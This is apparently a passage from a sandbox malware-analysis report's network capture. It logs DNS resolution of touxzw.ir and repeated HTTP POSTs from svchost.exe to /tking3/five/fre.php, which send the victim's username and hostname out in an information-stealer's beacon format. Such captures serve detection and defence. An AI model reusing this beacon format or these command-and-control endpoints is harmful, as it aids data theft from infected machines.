Feb 24, 2025 08:41:58.460866928 CET	50109	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:58.465900898 CET	80	50109	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:59.223037004 CET	80	50109	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:59.223148108 CET	50109	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:59.223997116 CET	80	50109	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:59.224071026 CET	50109	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:59.228176117 CET	80	50109	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:59.387403965 CET	50110	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:59.392466068 CET	80	50110	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:59.392560959 CET	50110	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:59.394491911 CET	50110	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:59.399482965 CET	80	50110	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:59.399540901 CET	50110	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:59.405311108 CET	80	50110	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:00.168292999 CET	80	50110	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:00.168520927 CET	50110	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:00.169214964 CET	80	50110	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:00.169279099 CET	50110	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:00.173625946 CET	80	50110	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:00.335563898 CET	50111	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:00.340673923 CET	80	50111	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:00.340869904 CET	50111	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:00.342844963 CET	50111	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:00.347903967 CET	80	50111	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:00.348043919 CET	50111	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:00.353039980 CET	80	50111	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:00.965572119 CET	80	50111	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:00.965637922 CET	80	50111	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:00.965681076 CET	50111	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:00.965717077 CET	50111	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:00.972031116 CET	80	50111	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:01.128537893 CET	50112	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:01.136688948 CET	80	50112	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:01.136775017 CET	50112	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:01.138751984 CET	50112	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:01.147171974 CET	80	50112	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:01.147226095 CET	50112	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:01.153769970 CET	80	50112	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:01.899295092 CET	80	50112	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:01.899517059 CET	50112	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:01.901400089 CET	80	50112	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:01.901495934 CET	50112	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:01.907402039 CET	80	50112	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:02.058516979 CET	50113	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:02.063657045 CET	80	50113	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:02.063868999 CET	50113	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:02.065701962 CET	50113	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:02.070796967 CET	80	50113	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:02.070941925 CET	50113	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:02.075959921 CET	80	50113	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:02.703269005 CET	80	50113	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:02.703391075 CET	50113	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:02.704186916 CET	80	50113	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:02.704238892 CET	50113	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:02.708393097 CET	80	50113	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:02.904850006 CET	50114	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:02.910160065 CET	80	50114	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:02.910260916 CET	50114	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:02.913331032 CET	50114	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:02.918329000 CET	80	50114	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:02.918391943 CET	50114	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:02.923444033 CET	80	50114	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:03.709506989 CET	80	50114	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:03.709673882 CET	50114	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:03.710515976 CET	80	50114	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:03.710570097 CET	50114	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:03.714734077 CET	80	50114	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:03.878191948 CET	50115	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:03.883297920 CET	80	50115	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:03.886903048 CET	50115	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:03.889904976 CET	50115	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:03.894872904 CET	80	50115	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:03.899121046 CET	50115	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:03.904194117 CET	80	50115	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:04.678184032 CET	80	50115	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:04.678316116 CET	50115	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:04.678580999 CET	80	50115	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:04.678630114 CET	50115	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:04.683337927 CET	80	50115	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:04.846714020 CET	50116	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:04.851886988 CET	80	50116	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:04.851989985 CET	50116	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:04.855026960 CET	50116	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:04.859982967 CET	80	50116	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:04.860064983 CET	50116	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:04.865149021 CET	80	50116	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:05.629596949 CET	80	50116	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:05.629645109 CET	80	50116	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:05.629714012 CET	50116	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:05.631352901 CET	50116	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:05.636445045 CET	80	50116	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:05.791136026 CET	50117	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:05.796341896 CET	80	50117	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:05.796435118 CET	50117	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:05.798479080 CET	50117	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:05.803539038 CET	80	50117	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:05.803639889 CET	50117	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:05.808737993 CET	80	50117	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:06.576626062 CET	80	50117	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:06.577166080 CET	80	50117	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:06.577277899 CET	50117	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:06.577886105 CET	50117	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:06.583578110 CET	80	50117	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:06.738799095 CET	50118	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:06.743853092 CET	80	50118	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:06.743962049 CET	50118	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:06.746016026 CET	50118	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:06.751053095 CET	80	50118	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:06.751125097 CET	50118	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:06.756133080 CET	80	50118	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:07.386048079 CET	80	50118	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:07.386260033 CET	50118	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:07.386604071 CET	80	50118	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:07.386688948 CET	50118	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:07.391275883 CET	80	50118	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:07.544648886 CET	50119	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:07.549827099 CET	80	50119	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:07.549902916 CET	50119	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:07.552870035 CET	50119	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:07.557884932 CET	80	50119	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:07.557951927 CET	50119	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:07.563025951 CET	80	50119	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:08.184281111 CET	80	50119	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:08.184381962 CET	50119	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:08.185120106 CET	80	50119	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:08.185173988 CET	50119	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:08.189450979 CET	80	50119	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:08.353137016 CET	50120	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:08.358194113 CET	80	50120	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:08.358302116 CET	50120	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:08.360426903 CET	50120	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:08.365454912 CET	80	50120	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:08.365524054 CET	50120	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:08.370583057 CET	80	50120	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:08.985246897 CET	80	50120	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:08.985651016 CET	80	50120	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:08.985729933 CET	50120	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:08.987848997 CET	50120	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:08.992887020 CET	80	50120	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:09.171025991 CET	50121	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:09.176106930 CET	80	50121	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:09.176189899 CET	50121	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:09.179192066 CET	50121	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:09.184168100 CET	80	50121	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:09.184226036 CET	50121	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:09.189193964 CET	80	50121	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:09.808022976 CET	80	50121	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:09.808134079 CET	50121	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:09.808303118 CET	80	50121	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:09.808353901 CET	50121	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:09.813147068 CET	80	50121	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:09.972592115 CET	50122	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:09.977725029 CET	80	50122	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:09.977832079 CET	50122	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:09.980798960 CET	50122	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:09.985861063 CET	80	50122	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:09.985917091 CET	50122	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:09.990885019 CET	80	50122	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:10.648806095 CET	80	50122	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:10.648906946 CET	50122	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:10.649102926 CET	80	50122	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:10.649152994 CET	50122	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:10.653938055 CET	80	50122	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:10.813688993 CET	50123	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:10.818754911 CET	80	50123	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:10.818845034 CET	50123	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:10.820656061 CET	50123	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:10.825623989 CET	80	50123	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:10.825700998 CET	50123	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:10.830735922 CET	80	50123	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:11.473891973 CET	80	50123	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:11.474041939 CET	50123	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:11.474484921 CET	80	50123	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:11.474554062 CET	50123	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:11.479124069 CET	80	50123	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:11.640844107 CET	50124	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:11.646006107 CET	80	50124	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:11.646234035 CET	50124	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:11.648449898 CET	50124	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:11.653529882 CET	80	50124	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:11.653600931 CET	50124	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:11.658613920 CET	80	50124	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:12.422249079 CET	80	50124	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:12.422370911 CET	50124	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:12.423185110 CET	80	50124	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:12.423252106 CET	50124	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:12.427462101 CET	80	50124	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:12.583133936 CET	50125	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:12.588272095 CET	80	50125	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:12.588361025 CET	50125	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:12.590145111 CET	50125	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:12.595257044 CET	80	50125	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:12.595333099 CET	50125	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:12.600373030 CET	80	50125	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:13.230880976 CET	80	50125	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:13.231254101 CET	50125	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:13.232012033 CET	80	50125	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:13.232090950 CET	50125	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:13.236373901 CET	80	50125	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:13.392261982 CET	50126	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:13.397418022 CET	80	50126	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:13.397563934 CET	50126	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:13.399507999 CET	50126	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:13.404575109 CET	80	50126	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:13.404659033 CET	50126	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:13.409790039 CET	80	50126	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:14.158319950 CET	80	50126	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:14.158432007 CET	50126	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:14.159507036 CET	80	50126	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:14.159574986 CET	50126	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:14.163542986 CET	80	50126	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:14.321484089 CET	50127	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:14.326638937 CET	80	50127	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:14.326738119 CET	50127	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:14.328788996 CET	50127	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:14.333852053 CET	80	50127	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:14.333925962 CET	50127	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:14.338931084 CET	80	50127	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:15.116254091 CET	80	50127	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:15.116374016 CET	50127	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:15.117816925 CET	80	50127	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:15.117897987 CET	50127	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:15.122304916 CET	80	50127	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:15.282321930 CET	50128	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:15.288644075 CET	80	50128	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:15.288873911 CET	50128	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:15.290888071 CET	50128	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:15.296027899 CET	80	50128	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:15.296099901 CET	50128	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:15.301254988 CET	80	50128	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:15.914369106 CET	80	50128	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:15.914469004 CET	50128	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:15.914928913 CET	80	50128	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:15.914984941 CET	50128	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:15.921705008 CET	80	50128	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:16.072756052 CET	50129	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:16.078027010 CET	80	50129	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:16.078131914 CET	50129	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:16.080195904 CET	50129	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:16.085230112 CET	80	50129	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:16.085309029 CET	50129	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:16.090497971 CET	80	50129	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:16.704225063 CET	80	50129	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:16.704608917 CET	80	50129	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:16.704730988 CET	50129	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:16.704775095 CET	50129	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:16.710825920 CET	80	50129	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:16.923418045 CET	50130	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:16.928893089 CET	80	50130	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:16.932949066 CET	50130	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:16.935034037 CET	50130	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:16.940186024 CET	80	50130	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:16.940915108 CET	50130	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:16.946007013 CET	80	50130	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:17.694037914 CET	80	50130	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:17.694143057 CET	50130	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:17.694258928 CET	80	50130	104.21.48.1	192.168.2.4
Feb 24, 2025 08:42:17.694303989 CET	50130	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:42:17.699246883 CET	80	50130	104.21.48.1	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 24, 2025 08:40:16.692289114 CET	54082	53	192.168.2.4	1.1.1.1
Feb 24, 2025 08:40:16.785578966 CET	53	54082	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 24, 2025 08:40:16.692289114 CET	192.168.2.4	1.1.1.1	0x1c4f	Standard query (0)	touxzw.ir	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Feb 24, 2025 08:40:16.785578966 CET	1.1.1.1	192.168.2.4	0x1c4f	No error (0)	touxzw.ir	104.21.48.1	A (IP address)	IN (0x0001)	false
Feb 24, 2025 08:40:16.785578966 CET	1.1.1.1	192.168.2.4	0x1c4f	No error (0)	touxzw.ir	104.21.112.1	A (IP address)	IN (0x0001)	false
Feb 24, 2025 08:40:16.785578966 CET	1.1.1.1	192.168.2.4	0x1c4f	No error (0)	touxzw.ir	104.21.32.1	A (IP address)	IN (0x0001)	false
Feb 24, 2025 08:40:16.785578966 CET	1.1.1.1	192.168.2.4	0x1c4f	No error (0)	touxzw.ir	104.21.80.1	A (IP address)	IN (0x0001)	false
Feb 24, 2025 08:40:16.785578966 CET	1.1.1.1	192.168.2.4	0x1c4f	No error (0)	touxzw.ir	104.21.16.1	A (IP address)	IN (0x0001)	false
Feb 24, 2025 08:40:16.785578966 CET	1.1.1.1	192.168.2.4	0x1c4f	No error (0)	touxzw.ir	104.21.96.1	A (IP address)	IN (0x0001)	false
Feb 24, 2025 08:40:16.785578966 CET	1.1.1.1	192.168.2.4	0x1c4f	No error (0)	touxzw.ir	104.21.64.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

touxzw.ir

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:16.797329903 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 176 Connection: close
Feb 24, 2025 08:40:16.802412033 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones841618JONES-PCk0FDD42EE188E931437F4FBE2CQmEUD
Feb 24, 2025 08:40:17.542422056 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Mon, 24 Feb 2025 07:40:17 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o0jFEsx86ewuDos4zN%2F4AC09fe8fBxXmIbtoV7FFfrlLcchpenpGsKnSy93%2FIQiVICM1UqNSrWpGp8L923vwO0SIsNDpEp4XvQEUV6vnvWjUEUZeVLFcf9WCGdQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dce7f7ea30f99-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1444&min_rtt=1444&rtt_var=722&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=417&delivery_rate=0&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:17.896800995 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 176 Connection: close
Feb 24, 2025 08:40:17.901954889 CET	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones841618JONES-PC+0FDD42EE188E931437F4FBE2Ci1iRq
Feb 24, 2025 08:40:18.709151983 CET	815	IN	HTTP/1.1 404 Not Found Date: Mon, 24 Feb 2025 07:40:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BHJ9K6CIio6nUEZdypad%2B%2FNq5MPDPqHLCtBbfiwH%2BIqqt01vN842x8NtZgc1tZ8xNknTmkL3xF%2BLMOwpxug7ACRNoDTj0tQ%2F6L5xsF8jrW8owjqRl4pYqrAuTwI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 916dce869d9842f5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1570&rtt_var=785&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=417&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	104.21.48.1	80	7536	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 24, 2025 08:40:18.782649040 CET	241	OUT	POST /tking3/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3D34D978 Content-Length: 149 Connection: close
Feb 24, 2025 08:40:18.787787914 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones841618JONES-PC0FDD42EE188E931437F4FBE2C
